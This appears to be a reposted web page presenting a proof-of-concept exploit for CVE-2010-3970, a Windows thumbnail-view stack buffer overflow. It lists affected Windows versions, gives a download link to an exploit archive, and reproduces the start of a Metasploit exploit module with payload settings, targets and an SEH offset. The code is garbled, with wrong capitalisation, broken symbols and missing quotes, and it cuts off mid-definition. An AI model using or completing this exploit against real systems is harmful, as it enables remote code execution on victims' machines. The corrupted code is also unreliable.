Microsoft Windows CreateSizedDIBSECTION () thumbnail view stack buffer overflow vulnerability POC

The remote stack buffer overflow vulnerability exists in Microsoft Windows Graphics Rendering Engine, remote attackers can exploit this vulnerability to trick users into accessing malicious web pages or opening and processing malicious Office documents to corrupt the memory and execute arbitrary code or cause DOS.
Resource:
Msf has been updated a few days ago.
Link: https://www.metasploit.com/redmi... esizeddibsection. rb
Download:

Http://down.qiannao.com/space/file/yulegu/-4e0a-4f20-5206-4eab/ms11_xxx_createsizeddibsection.rar/.page

Affected Systems:
Microsoft Windows XP Professional
Microsoft Windows Vista SP2
Microsoft Windows Vista SP1
Microsoft Windows Vista
Microsoft Windows Server 2008
Microsoft Windows Server 2003

 

Poc:

##
# $ Id: ms11_xxx_createsizeddibsection.rb 11466 15: 30: 29Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject
# Redistribution and specified cial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# Http://metasploit.com/framework/
##

Require msf/core

Class Metasploit3 <Msf: Exploit: Remote
Rank = GreatRanking

Include Msf: Exploit: FILEFORMAT
Include Msf: Exploit: Seh

Def initialize (info = {})
Super (update_info (info,
Name => Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow,
Description => % q {
This module exploits a stack-based buffer overflow in the handling of thumbnails
Within. MIC files and various Office documents. When processing a thumbnail bitmap
Containing a negative biClrUsed value, a stack-based buffer overflow occurs. This
Leads to arbitrary code execution.

In order to trigger the vulnerable code, the folder containing the document must be
Viewed using the "Thumbnails" view.
},
License => MSF_LICENSE,
Author =>
[
Moti & Xu Hao, # original discovery
Yaniv Miron aka Lament of ilhack,
Jduck # Metasploit module
],
Version => $ Revision: 11466 $,
References =>
[
[CVE, 2010-3970],
# [OSVDB ,????? ],
# [MSB, MS11-XXX],
# [BID ,???? ],
[URL, http://www.powerofcommunity.net/schedule.html]
],
DefaultOptions =>
{
EXITFUNC => seh,
AutoRunScript => migrate-f
},
Payload =>
{
Space = & gt; 512,
BadChars => "x00 ",
DisableNops => true # no need
},
Platform => win,
Targets =>
[
# This automatic target will combine all targets into one file :)
[Automatic, {}],

# Windows 2000 is a soft target... Youre not still using it are you?
[Windows 2000 SP0/SP4 English,
{
Offset => 1548, # Offset to SEH frame
& Nbs